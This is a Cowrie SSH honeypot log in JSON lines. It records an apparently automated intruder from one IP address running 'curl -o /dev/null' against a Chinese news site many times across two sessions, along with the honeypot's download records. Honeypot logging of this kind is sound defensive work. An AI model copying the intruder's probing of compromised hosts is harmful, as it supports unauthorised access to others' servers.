{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.598963Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.600430Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.645952Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.647693Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.648658Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.651694Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.652720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.666608Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.685334Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.686404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.690020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.691363Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.759968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.761106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.771015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.772333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.792429Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.809000Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.832681Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.864511Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.868515Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.882167Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.891069Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.907112Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.908074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.928648Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.937210Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.938153Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.970357Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.995699Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.997175Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.014065Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.015711Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.033913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.034950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.047888Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.051195Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.072171Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.073252Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.085360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.086507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.095949Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.146156Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.162534Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.163796Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.170879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.171774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.191347Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.192847Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.228779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.230027Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.234113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.235001Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.286520Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.287869Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.296030Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.297073Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.311486Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.312974Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.358942Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.361772Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.363168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.365882Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.373665Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.374809Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.395994Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.399015Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.436671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.438044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.440126Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.441456Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.445838Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.446908Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.471433Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.473093Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.516847Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.518144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.521506Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.522678Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.560400Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.562029Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.615992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.617303Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.620289Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.622256Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.623515Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.668854Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.670290Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.688949Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.690234Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.694936Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.696250Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.712270Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.718558Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.748826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.750109Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.755113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.756142Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.778157Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.787948Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.823187Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.824944Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.832186Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.845361Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.846775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.851568Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.852850Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.868141Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.871250Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:04.896483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:04.897728Z","src_ip":"212.227.125.160","session":"7541ed730449"}
